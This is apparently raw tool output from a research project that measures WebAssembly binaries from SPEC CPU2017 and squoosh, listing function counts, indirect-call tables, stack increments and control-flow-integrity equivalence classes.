17 | "spec_cpu2017/upstream/519.lbm_r/lbm_r.wasm.security-analysis.txt:cfi_latex_csv_sum_avg_line:519.lbm",13390,180,12,80,7,6,5,1,8,"2,4",1
18 | "spec_cpu2017/upstream/520.omnetpp_r/omnetpp_r.wasm.security-analysis.txt:cfi_latex_csv_sum_avg_line:520.omnetpp",619334,38324,4536,4615,3569,3505,79,1,1631,"57,4177215189873",1
19 | "spec_cpu2017/upstream/523.xalancbmk_r/cpuxalan_r.wasm.security-analysis.txt:cfi_latex_csv_sum_avg_line:523.xalancbmk",1460724,70030,13567,8050,6225,6072,77,1,3893,"176,194805194805",1
20 | "spec_cpu2017/upstream/525.x264_r-fastcomp/ldecod_r.wasm.security-analysis.txt:cfi_latex_csv_sum_avg_line:",233043,3776,354,551,129,68,24,1,135,"14,75",4
21 | "spec_cpu2017/upstream/525.x264_r-fastcomp/x264_r.wasm.security-analysis.txt:cfi_latex_csv_sum_avg_line:",283564,4677,773,636,253,177,31,1,105,"24,9354838709677",6
22 | "spec_cpu2017/upstream/526.blender_r/blender_r.wasm.security-analysis.txt:cfi_latex_csv_sum_avg_line:526.blender",3182291,98122,17198,25901,17387,17263,128,1,5360,"134,359375",2
23 | "spec_cpu2017/upstream/531.deepsjeng_r/deepsjeng_r.wasm.security-analysis.txt:cfi_latex_csv_sum_avg_line:531.deepsjeng",52981,888,10,174,10,8,5,1,6,2,1
24 | "spec_cpu2017/upstream/538.imagick_r/imagick_r.wasm.security-analysis.txt:cfi_latex_csv_sum_avg_line:538.imagick",517550,17283,1901,1068,91,74,22,1,1592,"86,4090909090909",3
25 | "spec_cpu2017/upstream/541.leela_r/leela_r.wasm.security-analysis.txt:cfi_latex_csv_sum_avg_line:541.leela",118808,4981,263,1101,600,520,41,1,74,"6,41463414634146",1
26 | "spec_cpu2017/upstream/544.nab_r/nab_r.wasm.security-analysis.txt:cfi_latex_csv_sum_avg_line:544.nab",55588,987,17,201,10,8,6,1,7,"2,83333333333333",1
27 | "spec_cpu2017/upstream/557.xz_r/xz_r.wasm.security-analysis.txt:cfi_latex_csv_sum_avg_line:557.xz",53283,577,71,250,98,86,19,1,11,"3,73684210526316",3
28 | ,19191206,700794,76426,98924,48681,47571,,,,,
29 | ,,"Percent","9,83325184632408",,"49,2105050341676","48,0884315231895",,,,,
30 | 


--------------------------------------------------------------------------------
/quantitative-evaluation/raw-tool-output/real-world/squoosh-imagecodecs/hqx-rs-8c087e0290bb39f1e090.module.wasm.txt:
--------------------------------------------------------------------------------
  1 | filename: ./squoosh-imagecodecs/hqx-rs-8c087e0290bb39f1e090.module.wasm
  2 |   benchmark: squoosh-imagecodecs
  3 |   binary:    hqx-rs-8c087e0290bb39f1e090.module.wasm
  4 | 
  5 | Functions:        73
  6 |   Imported:        0
  7 |   Non-imported:   73
  8 |   Exported:        4
  9 | 
 10 | Tables: 1 (should be 1 in Wasm v1)
 11 |   Table entries at init:        24
 12 |   Of those, unique functions:   17 (i.e., at least 23.29% of all functions can be called indirectly, because they are in the [indirect call] table)
 13 | 
 14 | Instructions:    111437
 15 |   call:            5891 (5.29% of all instructions)
 16 |   call_indirect:     34 (0.03% of all, 0.57% of all calls)
 17 | 
 18 | Globals:
 19 |   #0 i32
 20 |      init: i32.const 1048576
 21 |      29 × global.get   48 × global.set   77 total (38/62% split)
 22 | 
 23 | Likely the stack pointer:       Global #0
 24 | Functions using stack pointer:   29 (39.73% of all non-imported functions)
 25 | Stack increments: (How many functions increment the stack pointer by how much? Can also handle multiple increments per function, that's why it is an array of increments.)
 26 |     2  (2.74%) × [-128]
 27 |     2  (2.74%) × [-112]
 28 |     4  (5.48%) × [-64]
 29 |     6  (8.22%) × [-32]
 30 |     6  (8.22%) × [-16]
 31 |     9 (12.33%) × [-48]
 32 |    44 (60.27%) × []
 33 |   functions with stack allocation total: 29 (39.73%)
 34 | 
 35 | csv lines to extract for sp analysis and plots:
 36 | benchmark,binary,funccount,percent,sp_increments,increment_sum,increment_sum_abs
 37 | sp_csv_line:"squoosh-imagecodecs","hqx-rs-8c087e0290bb39f1e090.module.wasm",2,2.739726,"[-128]",-128,128
 38 | sp_csv_line:"squoosh-imagecodecs","hqx-rs-8c087e0290bb39f1e090.module.wasm",2,2.739726,"[-112]",-112,112
 39 | sp_csv_line:"squoosh-imagecodecs","hqx-rs-8c087e0290bb39f1e090.module.wasm",4,5.479452,"[-64]",-64,64
 40 | sp_csv_line:"squoosh-imagecodecs","hqx-rs-8c087e0290bb39f1e090.module.wasm",6,8.219178,"[-32]",-32,32
 41 | sp_csv_line:"squoosh-imagecodecs","hqx-rs-8c087e0290bb39f1e090.module.wasm",6,8.219178,"[-16]",-16,16
 42 | sp_csv_line:"squoosh-imagecodecs","hqx-rs-8c087e0290bb39f1e090.module.wasm",9,12.328767,"[-48]",-48,48
 43 | sp_csv_line:"squoosh-imagecodecs","hqx-rs-8c087e0290bb39f1e090.module.wasm",44,60.27397,"[]",0,0
 44 | 
 45 | Counts of function types (16 unique types):
 46 |     1  (1.37%) × [] -> [i32]
 47 |     1  (1.37%) × [i32] -> [i64]
 48 |     1  (1.37%) × [i32, i32, i32, i32] -> [i32]
 49 |     1  (1.37%) × [i32, i32, i32, i32, i32, i32] -> []
 50 |     1  (1.37%) × [i64, i32] -> [i32]
 51 |     2  (2.74%) × [i32, i32, i32, i32, i32, i32, i32] -> [i32]
 52 |     3  (4.11%) × [i32, i32, i32, i32, i32, i32, i32, i32] -> []
 53 |     4  (5.48%) × [i32, i32, i32, i32] -> []
 54 |     4  (5.48%) × [i32, i32, i32, i32, i32] -> [i32]
 55 |     5  (6.85%) × [i32] -> [i32]
 56 |     5  (6.85%) × [i32, i32, i32] -> []
 57 |     7  (9.59%) × [] -> []
 58 |     7  (9.59%) × [i32] -> []
 59 |     7  (9.59%) × [i32, i32, i32] -> [i32]
 60 |     8 (10.96%) × [i32, i32] -> []
 61 |    16 (21.92%) × [i32, i32] -> [i32]
 62 | 
 63 | Functions with at least one call_indirect: 11 (15.07% of all functions)
 64 | 
 65 | Table elements initialization:
 66 |          range: [    1,   11]   length:  11   unique funcs:    9   type: [i32, i32] -> [i32]
 67 |          range: [   12,   12]   length:   1   unique funcs:    1   type: [i32] -> []
 68 |          range: [   13,   13]   length:   1   unique funcs:    1   type: [i32, i32, i32, i32] -> []
 69 |          range: [   14,   14]   length:   1   unique funcs:    1   type: [i32, i32] -> [i32]
 70 |          range: [   15,   15]   length:   1   unique funcs:    1   type: [i32] -> [i32]
 71 |          range: [   16,   16]   length:   1   unique funcs:    1   type: [i32] -> []
 72 |          range: [   17,   17]   length:   1   unique funcs:    1   type: [i32, i32, i32, i32] -> []
 73 |          range: [   18,   18]   length:   1   unique funcs:    1   type: [i32, i32] -> [i32]
 74 |          range: [   19,   19]   length:   1   unique funcs:    1   type: [i32] -> [i32]
 75 |          range: [   20,   21]   length:   2   unique funcs:    1   type: [i32] -> []
 76 |          range: [   22,   22]   length:   1   unique funcs:    1   type: [i32] -> [i64]
 77 |          range: [   23,   23]   length:   1   unique funcs:    1   type: [i32] -> []
 78 |          range: [   24,   24]   length:   1   unique funcs:    1   type: [i32] -> [i64]
 79 |   13 table init ranges in total
 80 | 
 81 | Patterns (=preceding instructions) of call_indirect:
 82 |      1 × unrestricted                         source:   i32.load   type [i32] -> [i32]
 83 |          functions matching by type (regardless whether they are in the table):                5
 84 |          functions matching by type and present in table (regardless at which table index):    2
 85 |          functions matching by type and present in permissable table index range:              2
 86 |     16 × unrestricted                         source:   i32.load   type [i32, i32] -> [i32]
 87 |          functions matching by type (regardless whether they are in the table):               16
 88 |          functions matching by type and present in table (regardless at which table index):   11
 89 |          functions matching by type and present in permissable table index range:             11
 90 |     16 × unrestricted                         source:   i32.load   type [i32, i32, i32] -> [i32]
 91 |          functions matching by type (regardless whether they are in the table):                7
 92 |          functions matching by type and present in table (regardless at which table index):    0
 93 |          functions matching by type and present in permissable table index range:              0
 94 |      1 × unrestricted                         source:   i32.load   type [i32, i32, i32, i32] -> []
 95 |          functions matching by type (regardless whether they are in the table):                4
 96 |          functions matching by type and present in table (regardless at which table index):    2
 97 |          functions matching by type and present in permissable table index range:              2
 98 |   4 call_indirect patterns in total
 99 | 
100 | 
101 | call_indirect target equivalence classes (CFI equivalence classes):
102 |   class #0
103 |     type: [i32] -> [i32]
104 |     start idx: None, end idx: None
105 |     size (of class): 2
106 |     count (how often class appears): 1
107 |   class #1
108 |     type: [i32, i32, i32, i32] -> []
109 |     start idx: None, end idx: None
110 |     size (of class): 2
111 |     count (how often class appears): 1
112 |   class #2
113 |     type: [i32, i32] -> [i32]
114 |     start idx: None, end idx: None
115 |     size (of class): 11
116 |     count (how often class appears): 16
117 |   class #3
118 |     type: [i32, i32, i32] -> [i32]
119 |     start idx: None, end idx: None
120 |     size (of class): 0
121 |     count (how often class appears): 16
122 | 
123 | latex CFI table line for this program: squoosh-imagecodecs & C & 111.4\kern.5ptk\kern1pt & 34 & 0.6\% & 73 & 17 & 23.3\% & 15 & 20.5\% & 4 & 1 & 16 & 8.5 \\
124 | cfi_latex_csv_sum_avg_line:squoosh-imagecodecs,111437,5891,34,73,17,15,4,1,16,8.5,16
125 | benchmark,binary,class,size,count,source
126 | cfi_csv_line:"squoosh-imagecodecs","hqx-rs-8c087e0290bb39f1e090.module.wasm",0,2,1,"i32.load"
127 | cfi_csv_line:"squoosh-imagecodecs","hqx-rs-8c087e0290bb39f1e090.module.wasm",1,2,1,"i32.load"
128 | cfi_csv_line:"squoosh-imagecodecs","hqx-rs-8c087e0290bb39f1e090.module.wasm",2,11,16,"i32.load"
129 | cfi_csv_line:"squoosh-imagecodecs","hqx-rs-8c087e0290bb39f1e090.module.wasm",3,0,16,"i32.load"
130 | total classes: 4
131 | 


--------------------------------------------------------------------------------
/quantitative-evaluation/raw-tool-output/spec-cpu/fastcomp/deepsjeng_r.wasm.security-analysis.txt:
--------------------------------------------------------------------------------
  1 | Functions:       164
  2 |   Imported:       14
  3 |   Non-imported:  150
  4 | 
  5 | Tables: 1 (should be 1 in Wasm v1)
  6 |   Table entries at init:        20
  7 |   Of those, unique functions:   15 (i.e., at least 9.15% of all functions can be called indirectly, because they are in the [indirect call] table)
  8 | 
  9 | Globals:
 10 |   #0 i32
 11 |      import: env.__table_base
 12 |        0 × global.get     0 × global.set     0 total
 13 |   #1 f64
 14 |      import: global.NaN
 15 |        3 × global.get     0 × global.set     3 total (100/0% split)
 16 |   #2 f64
 17 |      import: global.Infinity
 18 |        1 × global.get     0 × global.set     1 total (100/0% split)
 19 |   #3 i32
 20 |      init: i32.const 11984944
 21 |      101 × global.get   152 × global.set   253 total (40/60% split)
 22 | 
 23 | Likely the stack pointer:       Global #3
 24 | Functions using stack pointer:   48 (32.00% of all non-imported functions)
 25 | Stack increments: (How many functions increment the stack pointer by how much? Can also handle multiple increments per function, that's why it is an array of increments.)
 26 |     1  (0.67%) × [16, 16]
 27 |     1  (0.67%) × [48]
 28 |     1  (0.67%) × [96]
 29 |     1  (0.67%) × [128]
 30 |     1  (0.67%) × [144]
 31 |     1  (0.67%) × [160]
 32 |     1  (0.67%) × [192]
 33 |     1  (0.67%) × [224]
 34 |     1  (0.67%) × [256]
 35 |     1  (0.67%) × [288]
 36 |     1  (0.67%) × [512]
 37 |     1  (0.67%) × [560]
 38 |     1  (0.67%) × [560, 16]
 39 |     1  (0.67%) × [656]
 40 |     1  (0.67%) × [1120]
 41 |     1  (0.67%) × [1136]
 42 |     1  (0.67%) × [1488]
 43 |     1  (0.67%) × [1936]
 44 |     1  (0.67%) × [2448]
 45 |     1  (0.67%) × [2912]
 46 |     2  (1.33%) × [640]
 47 |     2  (1.33%) × [2080]
 48 |     5  (3.33%) × [32]
 49 |    16 (10.67%) × [16]
 50 | 
 51 | Counts of function types (29 unique types):
 52 |     1  (0.61%) × [i32] -> [i64]
 53 |     1  (0.61%) × [i32, i32] -> [f64]
 54 |     1  (0.61%) × [i32, i32, i32, i32] -> [f64]
 55 |     1  (0.61%) × [i32, i32, i32, i32, i32] -> [f64]
 56 |     1  (0.61%) × [i32, i32, i32, i32, i32, i32] -> [i32]
 57 |     1  (0.61%) × [i32, i32, i32, i32, i32, i32, i32, i32, i32] -> []
 58 |     1  (0.61%) × [i32, i32, i32, i32, i32, i32, i32, i32, i32] -> [i32]
 59 |     1  (0.61%) × [i32, i32, i64] -> []
 60 |     1  (0.61%) × [i32, i64] -> []
 61 |     1  (0.61%) × [i64, i32, i32] -> [i32]
 62 |     2  (1.22%) × [i32, i32, i32, i32, i32] -> []
 63 |     2  (1.22%) × [i32, f64, i32, i32, i32, i32] -> [i32]
 64 |     2  (1.22%) × [i64, i32] -> [i32]
 65 |     2  (1.22%) × [f64, f64] -> [f64]
 66 |     3  (1.83%) × [i32, i32, i32, i32] -> [i32]
 67 |     3  (1.83%) × [i32, i32, i32, i32, i32] -> [i32]
 68 |     3  (1.83%) × [i32, i64, i32] -> [i64]
 69 |     3  (1.83%) × [f64, i32] -> [f64]
 70 |     4  (2.44%) × [i32, i32] -> [i64]
 71 |     4  (2.44%) × [i64] -> [i32]
 72 |     4  (2.44%) × [i64, i32] -> [i64]
 73 |     6  (3.66%) × [] -> [i32]
 74 |    11  (6.71%) × [i32] -> []
 75 |    12  (7.32%) × [i32, i32, i32] -> []
 76 |    15  (9.15%) × [] -> []
 77 |    15  (9.15%) × [i32, i32, i32] -> [i32]
 78 |    16  (9.76%) × [i32, i32] -> []
 79 |    22 (13.41%) × [i32, i32] -> [i32]
 80 |    25 (15.24%) × [i32] -> [i32]
 81 | 
 82 | 
 83 | Functions with at least one call_indirect: 8 (5.33% of all functions)
 84 | 
 85 | Table elements initialization:
 86 |          range: [    0,    3]   length:   4   unique funcs:    3   type: [i32] -> [i32]
 87 |          range: [    4,    5]   length:   2   unique funcs:    2   type: [i32, f64, i32, i32, i32, i32] -> [i32]
 88 |          range: [    6,   13]   length:   8   unique funcs:    5   type: [i32, i32, i32] -> [i32]
 89 |          range: [   14,   17]   length:   4   unique funcs:    3   type: [i32, i64, i32] -> [i64]
 90 |          range: [   18,   19]   length:   2   unique funcs:    2   type: [i32, i32] -> []
 91 |   5 table init ranges in total
 92 | 
 93 | Patterns (=preceding instructions) of call_indirect:
 94 |      1 × range: [    0,    3]   length:   4   source:   i32.load   type: [i32] -> [i32]
 95 |          functions matching by type (regardless whether they are in the table):               25
 96 |          functions matching by type and present in table (regardless at which table index):    3
 97 |          functions matching by type and present in permissable table index range:              3
 98 |      1 × fixed index:      5                  source:  i32.const   type: [i32, f64, i32, i32, i32, i32] -> [i32]
 99 |          functions matching by type (regardless whether they are in the table):                2
100 |          functions matching by type and present in table (regardless at which table index):    2
101 |          functions matching by type and present in permissable table index range:              1
102 |      3 × range: [    6,   13]   length:   8   source:   i32.load   type: [i32, i32, i32] -> [i32]
103 |          functions matching by type (regardless whether they are in the table):               15
104 |          functions matching by type and present in table (regardless at which table index):    5
105 |          functions matching by type and present in permissable table index range:              5
106 |      3 × range: [    6,   13]   length:   8   source:  local.get   type: [i32, i32, i32] -> [i32]
107 |          functions matching by type (regardless whether they are in the table):               15
108 |          functions matching by type and present in table (regardless at which table index):    5
109 |          functions matching by type and present in permissable table index range:              5
110 |      1 × range: [   14,   17]   length:   4   source:  local.get   type: [i32, i64, i32] -> [i64]
111 |          functions matching by type (regardless whether they are in the table):                3
112 |          functions matching by type and present in table (regardless at which table index):    3
113 |          functions matching by type and present in permissable table index range:              3
114 |      1 × fixed index:     19                  source:  i32.const   type: [i32, i32] -> []
115 |          functions matching by type (regardless whether they are in the table):               16
116 |          functions matching by type and present in table (regardless at which table index):    2
117 |          functions matching by type and present in permissable table index range:              1
118 |   6 call_indirect patterns in total
119 | 
120 | function #106 is indirectly called with a fixed table index
121 |   global.get 3
122 |   local.set 21
123 |   global.get 3
124 |   ...
125 | function #105 is indirectly called with a fixed table index
126 |   local.get 1
127 |   i32.load align=2
128 |   i32.const 7
129 |   ...
130 | 
131 | call_indirect target equivalence classes (CFI equivalence classes):
132 |   type: [i32] -> [i32], start idx: Some(0), end idx: Some(3), size (of class): 3, count (how often class appears: 1
133 |   type: [i32, i64, i32] -> [i64], start idx: Some(14), end idx: Some(17), size (of class): 3, count (how often class appears: 1
134 |   type: [i32, i32, i32] -> [i32], start idx: Some(6), end idx: Some(13), size (of class): 5, count (how often class appears: 6
135 |   type: [i32, i32] -> [], start idx: Some(19), end idx: Some(19), size (of class): 1, count (how often class appears: 1
136 |   type: [i32, f64, i32, i32, i32, i32] -> [i32], start idx: Some(5), end idx: Some(5), size (of class): 1, count (how often class appears: 1
137 | 
138 | latex CFI table line for this program: C & 49.4k & 780 & 10 & 1.27\% & 164 & 15 & 9.1\% & 8 & 5.3\% & 136 & 40 & 29.4\% & 38 & 27.9\% && 18 & 13.2\%
139 | 
140 | class;size;count
141 | 0;3;1
142 | 1;3;1
143 | 2;5;6
144 | 3;1;1
145 | 4;1;1
146 | total classes: 5
147 | 


--------------------------------------------------------------------------------
/quantitative-evaluation/raw-tool-output/spec-cpu/fastcomp/lbm_r.wasm.security-analysis.txt:
--------------------------------------------------------------------------------
  1 | Functions:        87
  2 |   Imported:       15
  3 |   Non-imported:   72
  4 | 
  5 | Tables: 1 (should be 1 in Wasm v1)
  6 |   Table entries at init:        16
  7 |   Of those, unique functions:   13 (i.e., at least 14.94% of all functions can be called indirectly, because they are in the [indirect call] table)
  8 | 
  9 | Globals:
 10 |   #0 i32
 11 |      import: env.__table_base
 12 |       0 × global.get    0 × global.set    0 total
 13 |   #1 i32
 14 |      init: i32.const 6320
 15 |      43 × global.get   50 × global.set   93 total (46/54% split)
 16 | 
 17 | Likely the stack pointer:       Global #1
 18 | Functions using stack pointer:   21 (29.17% of all non-imported functions)
 19 | Stack increments: (How many functions increment the stack pointer by how much? Can also handle multiple increments per function, that's why it is an array of increments.)
 20 |     1  (1.39%) × [80]
 21 |     1  (1.39%) × [128]
 22 |     1  (1.39%) × [224]
 23 |     1  (1.39%) × [256]
 24 |     1  (1.39%) × [560]
 25 |     2  (2.78%) × [48]
 26 |     4  (5.56%) × [32]
 27 |     6  (8.33%) × [16]
 28 | 
 29 | Counts of function types (16 unique types):
 30 |     1  (1.15%) × [] -> []
 31 |     1  (1.15%) × [i32, i32, i32, i32, i32] -> []
 32 |     1  (1.15%) × [i32, i32, i32, i32, i32] -> [i32]
 33 |     1  (1.15%) × [i64, i32, i32] -> [i32]
 34 |     1  (1.15%) × [f64, i32] -> [f64]
 35 |     2  (2.30%) × [i32, i32, i32, i32] -> [i32]
 36 |     2  (2.30%) × [i32, f64, i32, i32, i32, i32] -> [i32]
 37 |     2  (2.30%) × [i64, i32] -> [i32]
 38 |     3  (3.45%) × [] -> [i32]
 39 |     3  (3.45%) × [i32, i32, i32] -> []
 40 |     3  (3.45%) × [i32, i64, i32] -> [i64]
 41 |     8  (9.20%) × [i32, i32] -> []
 42 |     9 (10.34%) × [i32, i32, i32] -> [i32]
 43 |    15 (17.24%) × [i32, i32] -> [i32]
 44 |    16 (18.39%) × [i32] -> []
 45 |    19 (21.84%) × [i32] -> [i32]
 46 | 
 47 | 
 48 | Functions with at least one call_indirect: 10 (13.89% of all functions)
 49 | 
 50 | Table elements initialization:
 51 |          range: [    0,    3]   length:   4   unique funcs:    3   type: [i32] -> [i32]
 52 |          range: [    4,    5]   length:   2   unique funcs:    2   type: [i32, f64, i32, i32, i32, i32] -> [i32]
 53 |          range: [    6,    9]   length:   4   unique funcs:    3   type: [i32, i32, i32] -> [i32]
 54 |          range: [   10,   13]   length:   4   unique funcs:    3   type: [i32, i64, i32] -> [i64]
 55 |          range: [   14,   15]   length:   2   unique funcs:    2   type: [i32, i32] -> []
 56 |   5 table init ranges in total
 57 | 
 58 | Patterns (=preceding instructions) of call_indirect:
 59 |      1 × range: [    0,    3]   length:   4   source:   i32.load   type: [i32] -> [i32]
 60 |          functions matching by type (regardless whether they are in the table):               19
 61 |          functions matching by type and present in table (regardless at which table index):    3
 62 |          functions matching by type and present in permissable table index range:              3
 63 |      1 × fixed index:      5                  source:  i32.const   type: [i32, f64, i32, i32, i32, i32] -> [i32]
 64 |          functions matching by type (regardless whether they are in the table):                2
 65 |          functions matching by type and present in table (regardless at which table index):    2
 66 |          functions matching by type and present in permissable table index range:              1
 67 |      3 × range: [    6,    9]   length:   4   source:   i32.load   type: [i32, i32, i32] -> [i32]
 68 |          functions matching by type (regardless whether they are in the table):                9
 69 |          functions matching by type and present in table (regardless at which table index):    3
 70 |          functions matching by type and present in permissable table index range:              3
 71 |      5 × range: [    6,    9]   length:   4   source:  local.get   type: [i32, i32, i32] -> [i32]
 72 |          functions matching by type (regardless whether they are in the table):                9
 73 |          functions matching by type and present in table (regardless at which table index):    3
 74 |          functions matching by type and present in permissable table index range:              3
 75 |      1 × range: [   10,   13]   length:   4   source:  local.get   type: [i32, i64, i32] -> [i64]
 76 |          functions matching by type (regardless whether they are in the table):                3
 77 |          functions matching by type and present in table (regardless at which table index):    3
 78 |          functions matching by type and present in permissable table index range:              3
 79 |      1 × fixed index:     15                  source:  i32.const   type: [i32, i32] -> []
 80 |          functions matching by type (regardless whether they are in the table):                8
 81 |          functions matching by type and present in table (regardless at which table index):    2
 82 |          functions matching by type and present in permissable table index range:              1
 83 |   6 call_indirect patterns in total
 84 | 
 85 | function #71 is indirectly called with a fixed table index
 86 |   global.get 1
 87 |   local.set 21
 88 |   global.get 1
 89 |   ...
 90 | function #70 is indirectly called with a fixed table index
 91 |   local.get 1
 92 |   i32.load align=2
 93 |   i32.const 7
 94 |   ...
 95 | 
 96 | call_indirect target equivalence classes (CFI equivalence classes):
 97 |   type: [i32, i64, i32] -> [i64], start idx: Some(10), end idx: Some(13), size (of class): 3, count (how often class appears: 1
 98 |   type: [i32] -> [i32], start idx: Some(0), end idx: Some(3), size (of class): 3, count (how often class appears: 1
 99 |   type: [i32, i32] -> [], start idx: Some(15), end idx: Some(15), size (of class): 1, count (how often class appears: 1
100 |   type: [i32, i32, i32] -> [i32], start idx: Some(6), end idx: Some(9), size (of class): 3, count (how often class appears: 8
101 |   type: [i32, f64, i32, i32, i32, i32] -> [i32], start idx: Some(5), end idx: Some(5), size (of class): 1, count (how often class appears: 1
102 | 
103 | latex CFI table line for this program: C & 15.4k & 195 & 12 & 5.80\% & 87 & 13 & 14.9\% & 10 & 13.9\% & 104 & 34 & 32.7\% & 32 & 30.8\% && 12 & 11.5\%
104 | 
105 | class;size;count
106 | 0;3;1
107 | 1;3;1
108 | 2;1;1
109 | 3;3;8
110 | 4;1;1
111 | total classes: 5
112 | 


--------------------------------------------------------------------------------
/quantitative-evaluation/raw-tool-output/spec-cpu/fastcomp/mcf_r.wasm.security-analysis.txt:
--------------------------------------------------------------------------------
  1 | Functions:       127
  2 |   Imported:       14
  3 |   Non-imported:  113
  4 | 
  5 | Tables: 1 (should be 1 in Wasm v1)
  6 |   Table entries at init:        26
  7 |   Of those, unique functions:   20 (i.e., at least 15.75% of all functions can be called indirectly, because they are in the [indirect call] table)
  8 | 
  9 | Globals:
 10 |   #0 i32
 11 |      import: env.__table_base
 12 |       0 × global.get    0 × global.set    0 total
 13 |   #1 f64
 14 |      import: global.NaN
 15 |       3 × global.get    0 × global.set    3 total (100/0% split)
 16 |   #2 f64
 17 |      import: global.Infinity
 18 |       1 × global.get    0 × global.set    1 total (100/0% split)
 19 |   #3 i32
 20 |      init: i32.const 7104
 21 |      63 × global.get   76 × global.set  139 total (45/55% split)
 22 | 
 23 | Likely the stack pointer:       Global #3
 24 | Functions using stack pointer:   30 (26.55% of all non-imported functions)
 25 | Stack increments: (How many functions increment the stack pointer by how much? Can also handle multiple increments per function, that's why it is an array of increments.)
 26 |     1  (0.88%) × [96, 16]
 27 |     1  (0.88%) × [144]
 28 |     1  (0.88%) × [160]
 29 |     1  (0.88%) × [224]
 30 |     1  (0.88%) × [256]
 31 |     1  (0.88%) × [272]
 32 |     1  (0.88%) × [288]
 33 |     1  (0.88%) × [512]
 34 |     1  (0.88%) × [560]
 35 |     1  (0.88%) × [16288]
 36 |     2  (1.77%) × [48]
 37 |     4  (3.54%) × [32]
 38 |    11  (9.73%) × [16]
 39 | 
 40 | Counts of function types (33 unique types):
 41 |     1  (0.79%) × [] -> [f64]
 42 |     1  (0.79%) × [i32, i32] -> [i64]
 43 |     1  (0.79%) × [i32, i32] -> [f64]
 44 |     1  (0.79%) × [i32, i32, i32, i32] -> []
 45 |     1  (0.79%) × [i32, i32, i32, i32] -> [f64]
 46 |     1  (0.79%) × [i32, i32, i32, i32, i32] -> []
 47 |     1  (0.79%) × [i32, i32, i32, i32, i32] -> [f64]
 48 |     1  (0.79%) × [i32, i32, i32, i32, i32, i64, i64] -> [i32]
 49 |     1  (0.79%) × [i32, i32, i32, i64, i64] -> [i64]
 50 |     1  (0.79%) × [i32, i32, i64] -> []
 51 |     1  (0.79%) × [i32, i64] -> []
 52 |     1  (0.79%) × [i64] -> []
 53 |     1  (0.79%) × [i64] -> [i64]
 54 |     1  (0.79%) × [i64, i32, i32] -> [i32]
 55 |     1  (0.79%) × [i64, i64, i64, i64, i32, i32, i32, i32, i32, i32, i64, i64] -> []
 56 |     2  (1.57%) × [i32] -> [i64]
 57 |     2  (1.57%) × [i32, i32, i32, i32] -> [i32]
 58 |     2  (1.57%) × [i32, i32, i32, i32, i32] -> [i32]
 59 |     2  (1.57%) × [i32, i64] -> [i64]
 60 |     2  (1.57%) × [i32, f64, i32, i32, i32, i32] -> [i32]
 61 |     2  (1.57%) × [i64, i32] -> [i32]
 62 |     2  (1.57%) × [f64, f64] -> [f64]
 63 |     3  (2.36%) × [] -> [i32]
 64 |     3  (2.36%) × [i32, i64, i32] -> [i64]
 65 |     3  (2.36%) × [f64, i32] -> [f64]
 66 |     4  (3.15%) × [] -> [i64]
 67 |     5  (3.94%) × [i32, i32, i32] -> []
 68 |     7  (5.51%) × [i32, i32] -> []
 69 |     9  (7.09%) × [] -> []
 70 |    11  (8.66%) × [i32] -> []
 71 |    15 (11.81%) × [i32, i32, i32] -> [i32]
 72 |    19 (14.96%) × [i32] -> [i32]
 73 |    19 (14.96%) × [i32, i32] -> [i32]
 74 | 
 75 | 
 76 | Functions with at least one call_indirect: 12 (10.62% of all functions)
 77 | 
 78 | Table elements initialization:
 79 |          range: [    0,    3]   length:   4   unique funcs:    3   type: [i32] -> [i32]
 80 |          range: [    4,    5]   length:   2   unique funcs:    2   type: [i32, f64, i32, i32, i32, i32] -> [i32]
 81 |          range: [    6,    9]   length:   4   unique funcs:    3   type: [i32, i32] -> [i32]
 82 |          range: [   10,   17]   length:   8   unique funcs:    5   type: [i32, i32, i32] -> [i32]
 83 |          range: [   18,   19]   length:   2   unique funcs:    2   type: [i32, i64] -> [i64]
 84 |          range: [   20,   23]   length:   4   unique funcs:    3   type: [i32, i64, i32] -> [i64]
 85 |          range: [   24,   25]   length:   2   unique funcs:    2   type: [i32, i32] -> []
 86 |   7 table init ranges in total
 87 | 
 88 | Patterns (=preceding instructions) of call_indirect:
 89 |      1 × range: [    0,    3]   length:   4   source:   i32.load   type: [i32] -> [i32]
 90 |          functions matching by type (regardless whether they are in the table):               19
 91 |          functions matching by type and present in table (regardless at which table index):    3
 92 |          functions matching by type and present in permissable table index range:              3
 93 |      1 × fixed index:      5                  source:  i32.const   type: [i32, f64, i32, i32, i32, i32] -> [i32]
 94 |          functions matching by type (regardless whether they are in the table):                2
 95 |          functions matching by type and present in table (regardless at which table index):    2
 96 |          functions matching by type and present in permissable table index range:              1
 97 |     28 × range: [    6,    9]   length:   4   source:  local.get   type: [i32, i32] -> [i32]
 98 |          functions matching by type (regardless whether they are in the table):               19
 99 |          functions matching by type and present in table (regardless at which table index):    3
100 |          functions matching by type and present in permissable table index range:              3
101 |      2 × range: [   10,   17]   length:   8   source:   i32.load   type: [i32, i32, i32] -> [i32]
102 |          functions matching by type (regardless whether they are in the table):               15
103 |          functions matching by type and present in table (regardless at which table index):    5
104 |          functions matching by type and present in permissable table index range:              5
105 |      5 × range: [   10,   17]   length:   8   source:  local.get   type: [i32, i32, i32] -> [i32]
106 |          functions matching by type (regardless whether they are in the table):               15
107 |          functions matching by type and present in table (regardless at which table index):    5
108 |          functions matching by type and present in permissable table index range:              5
109 |      5 × fixed index:     19                  source:  i32.const   type: [i32, i64] -> [i64]
110 |          functions matching by type (regardless whether they are in the table):                2
111 |          functions matching by type and present in table (regardless at which table index):    2
112 |          functions matching by type and present in permissable table index range:              1
113 |      1 × range: [   20,   23]   length:   4   source:  local.get   type: [i32, i64, i32] -> [i64]
114 |          functions matching by type (regardless whether they are in the table):                3
115 |          functions matching by type and present in table (regardless at which table index):    3
116 |          functions matching by type and present in permissable table index range:              3
117 |      1 × fixed index:     25                  source:  i32.const   type: [i32, i32] -> []
118 |          functions matching by type (regardless whether they are in the table):                7
119 |          functions matching by type and present in table (regardless at which table index):    2
120 |          functions matching by type and present in permissable table index range:              1
121 |   8 call_indirect patterns in total
122 | 
123 | function #94 is indirectly called with a fixed table index
124 |   global.get 3
125 |   local.set 21
126 |   global.get 3
127 |   ...
128 | function #125 is indirectly called with a fixed table index
129 |   local.get 1
130 |   end
131 |   ...
132 | function #93 is indirectly called with a fixed table index
133 |   local.get 1
134 |   i32.load align=2
135 |   i32.const 7
136 |   ...
137 | 
138 | call_indirect target equivalence classes (CFI equivalence classes):
139 |   type: [i32, i32, i32] -> [i32], start idx: Some(10), end idx: Some(17), size (of class): 5, count (how often class appears: 7
140 |   type: [i32, i32] -> [], start idx: Some(25), end idx: Some(25), size (of class): 1, count (how often class appears: 1
